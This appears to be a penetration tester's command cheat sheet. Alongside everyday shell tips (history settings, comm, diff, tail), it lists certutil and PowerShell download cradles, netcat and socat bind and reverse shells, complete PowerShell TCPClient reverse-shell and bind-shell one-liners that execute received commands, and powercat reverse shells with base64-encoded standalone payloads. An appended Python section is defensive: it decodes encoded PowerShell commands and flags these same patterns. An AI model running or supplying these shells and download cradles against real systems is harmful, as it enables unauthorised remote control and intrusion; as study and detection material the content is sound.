# Important Commands

**Download**\
While wget or curl can grab files, axel (a multipart downloader) speeds up large downloads considerably: `axel -a -n 20 -o file.ext http://host/file.ext`

Download using certutil (note the switch is `-urlcache`):

`certutil -urlcache -f http://10.0.0.1/download/jsextension.exe jsextension.exe`

**History**\
Skip duplicate entries (`ignoreboth` additionally skips commands that begin with a space): `export HISTCONTROL=ignoredups`

Keep frequently run commands out of the history: `export HISTIGNORE="&:ls:[bf]g:exit:history"`

Timestamp each history entry: `export HISTTIMEFORMAT='%F %T '`

**File Comparison**

comm compares two sorted text files: `comm scan-a.txt scan-b.txt`

It prints three columns: lines only in the first file, lines only in the second file, and lines shared by both (the last column). Both inputs must be sorted, or comm reports false differences.

The `-1`, `-2` and `-3` switches suppress the corresponding column; `comm -12 scan-a.txt scan-b.txt` prints only the lines shared by both files.

diff supports many output formats: context format `-c`, unified format `-u`

vimdiff shows the two files side by side in 2 columns\
\
**Tail**

Output the last 2 lines of a file: `tail -n2 /var/log/apache.log`

Aliases replace a long command with a shorter one, e.g. `alias lsa='ls -la'`

**Bash**\
/etc/bash.bashrc [system-wide bash settings applied to any user at login]

**Netcat**

Connect: `nc -v -n ip port`; listen: `nc -nvlp 5555`

Transfer files with netcat. Receiving side: `nc -nlvp 4444 > file.exe`; sending side: `nc -nv ip 4444 < /location_of_file`

bind\
Listener (runs the shell): `nc -nlvp 4444 -e cmd.exe`; connecting side: `nc -nv ip 4444`

reverse\
Connecting side (runs the shell): `nc -nv ip 4444 -e /bin/bash`; listener: `nc -nlvp 4444`

**Socat**

Connect: `socat - TCP4:ip:port`\
Listener: `sudo socat TCP4-LISTEN:443 STDOUT`\
\
Reverse sh\
Listener: `socat -d -d TCP4-LISTEN:443 STDOUT`\
Connecting side: `socat TCP4:ip:port EXEC:/bin/bash`

Over OpenSSL (the address type is `EXEC:`, not `EXEC=`): listener `sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash`; connecting side `socat - OPENSSL:ip:port,verify=0`

**Powershell** \
`Set-ExecutionPolicy Unrestricted`

`Get-ExecutionPolicy`\
\
Transferring a file: `powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://ip/wget.exe','C:\temp\wget.exe')"`

**Shell:**

```powershell
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); } $client.Close();
```

**Bind shell:**

```powershell
$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

**Powercat**

Basically the PowerShell version of netcat; it simplifies the creation of bind and reverse shells.

File transfer:

`powercat -c ip -p 443 -i c:\location\powercat.ps1`

Simple reverse shell:

`powercat -c ip -p 443 -e cmd.exe`

`nc -lvp 443`

Powercat bind shell:

`powercat -l -p 443 -e cmd.exe`

`nc -nv ip 443`

**powercat standalone payloads:**

Generate an encoded payload: `powercat -c ip -p 443 -e cmd.exe -ge > reverse.ps1`

Run it with `powershell -E base64`, where base64 is the encoded payload written to reverse.ps1.
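A defender-side counterpart to the one-liners in the Shell, Bind shell and powercat sections, added here as an example and not part of the original notes: it decodes a `powershell -E` argument (the form `powercat -ge` produces) and flags the download and shell patterns listed above in process command lines. The indicator names, the `classify()` function and the sample command lines are my own constructions.

```python
import base64
import re

# Indicator patterns for the tool invocations listed in these notes. The pattern
# names are my own, not part of any product or of the original notes.
INDICATORS = {
    "tcpclient_iex": re.compile(r"Net\.Sockets\.TCPClient.*\b(iex|Invoke-Expression)\b", re.I | re.S),
    "webclient_download": re.compile(r"Net\.WebClient\)?\.DownloadFile\(", re.I),
    "certutil_urlcache": re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    "netcat_exec": re.compile(r"\b(nc|ncat|netcat|powercat)(\.exe)?\b.*\s-e\s", re.I),
}
# powershell -E / -EncodedCommand takes base64 of a UTF-16LE script (what powercat -ge emits).
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind a powershell -EncodedCommand argument, or None."""
    if not re.search(r"powershell", cmdline, re.I):
        return None
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Sorted indicator names matching the command line, including its decoded payload."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = cmdline + "\n" + decoded
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def encode_for_powershell(script):
    """Build a -E argument the way PowerShell expects it (used only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample process command lines; the IP and paths are placeholders, not real hosts.
SAMPLES = [
    "powershell -c \"(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.1/wget.exe','C:\\temp\\wget.exe')\"",
    "certutil -urlcache -f http://10.0.0.1/download/tool.exe tool.exe",
    "powercat -c 10.0.0.1 -p 443 -e cmd.exe",
    "powershell -E " + encode_for_powershell('$client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",443); iex $data'),
    "powershell -c \"Get-ChildItem C:\\Users | Out-String\"",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "clean", "<-", line[:60])
```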

